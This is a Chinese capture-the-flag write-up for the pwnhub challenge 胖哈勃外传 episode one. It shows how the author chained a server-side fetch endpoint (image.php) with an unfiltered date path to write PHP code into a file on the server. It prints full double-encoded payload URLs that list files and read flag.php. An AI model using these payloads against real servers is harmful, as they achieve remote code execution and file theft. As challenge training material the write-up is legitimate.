pwnhub——胖哈勃外传-第一集 writeup
2016-12-18 00:10
239 查看
第一步 查找漏洞
查看漏洞找了半天发现 源码中有一部分如下图
<script src="http://54.223.231.220/image.php?file=http://127.0.0.1:8888/test.png&path=logo.jpg"></script>
点击出现
console.log('logo.jpg update sucess!') 查看http://54.223.231.220/logo.jpg发现二维码 说明url将127.0.0.1:8888/test.png二维码存至logo.jpg下 典型的csrf跨站点请求访问
下面就要利用这个漏洞了
第二步 再查找漏洞
我们发现<script src="http://54.223.231.220/image.php?file=http://127.0.0.1:8888/test.png&path=logo.jpg"></script>
没有什么利用的价值,我们容易伪造请求
那么继续找漏洞
http://54.223.231.220/?date/2016-07/
我们将url改为
http://54.223.231.220/?date/2016-07%3Cb%3Eyz%3C/b%3E/
至此 ,我们可以伪造请求了
第三步 伪造请求
http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07<?php foreach(glob("./*") as $i) {echo $i;}?>/&path=yz.php //注意二次编码为 http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07%253c%253fphp%2520foreach(glob(%2522.%252f*%2522)%2520as%2520%2524i)%2520%257becho%2520%2524i%253b%257d%253f%253e/&path=yz.php[/code]
得到
发现flag.php
现在把他读出来http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07<?php echo file_get_contents('flag.php')?>/&path=yz.php 二次编码为 http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07%253c%253fphp%2becho%2bfile_get_contents(%2527flag.php%2527)%253f%253e/&path=yz.php[/code]
得到
相关文章推荐
- pwnhub——胖哈勃外传-第一集 writeup
- PwnHub-另一份文件-WriteUP
- 【SCTF&&CCTF 2016】 PWN_WRITEUP
- pwnstep1-2 writeup
- 请问如何用HUB使家里两台电脑同时上网
- 《笑傲网湖》第一回 从HUB和LANSWITCH开始
- Linux那些事儿之我是Hub(5)等待,只因曾经承诺
- Linux那些事儿之我是Hub(17)八大重量级函数闪亮登场(一)
- 关于HUB和SWITCH
- 家庭多台机器共享ADSL上网的方法(不带路由的猫+集线器(HUB)+若干根网线(三根以上,对于家庭两台机器以上))
- 决战水源之巅·外传之官儿
- 天轰穿-c#趣味编程系列视频 - vs2005/2008 winform实例入门 第一集
- [4月21日]《51CTO 编辑部的外传》——剧本篇(上)
- Hub and Spoke
- ArcGIS API for Silverlight开发入门(9)外传:在程序中调用AO
- OSI七层协议和Tcp/IP五层协议,路由器交换机和HUB的区别
- Writeup - A GPGPU Compiler for Memory Optimization and Parallelism Management
- 纪录片《敦煌》第一集:探险者来了
- HCD中Root Hub对象的初始化
- 读Linux那些事儿之我是HUB笔记(一)